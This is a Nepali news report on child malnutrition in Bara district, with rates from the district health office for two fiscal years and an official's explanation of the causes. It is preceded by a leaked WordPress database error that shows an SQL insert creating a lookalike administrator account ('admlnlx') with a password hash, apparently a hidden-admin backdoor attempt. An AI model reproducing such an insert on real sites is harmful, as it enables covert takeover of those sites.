WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0qj3wvpNeWwNJ1pjrMgYXU8fdcyr61', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-14 16:14:21', '', 'admlnlx', 'admlnlx')
कलैया,माघ ९ –
जिल्ला जनस्वास्थ्य कार्यालय बाराले आव ०७२÷७३ मा दुई वर्षमुनिका १८ हजार आठ सय १० बालबालिकाको तौल परीक्षण गर्दा ४।२८ प्रतिशत अर्थात् आठ सय छ जनामा कुपोषण देखिएको छ ।
कार्यालय प्रमुख रोशनलाल चौधरीका अनुसार बारा खाद्यान्न, दूध, माछा र मासु उत्पादनमा आत्मनिर्भर मानिन्छ । सो कार्यालयको गत आव ०७१÷७२ को तथ्याङ्कानुसार भने ५।०६ प्रतिशत कुपोषित रहेको कार्यालयका तथ्याङ्क प्रमुख रामनरेश यादवले बताउनुभयो ।
बालबालिकाको शारीरिक, मानसिक तथा शैक्षिक विकासका लागि पोषणयुक्त सन्तुलित भोजन हुन जरुरी भएको तर जनचेतना, शिक्षा र गरिबीले गर्दा पर्याप्त मात्रामा उत्पादित खाद्यवस्तुको सही तरिकाबाट उपभोग नगरेको हुनाले बालबालिका कुपोषित भएको जनाइएको छ । – रासस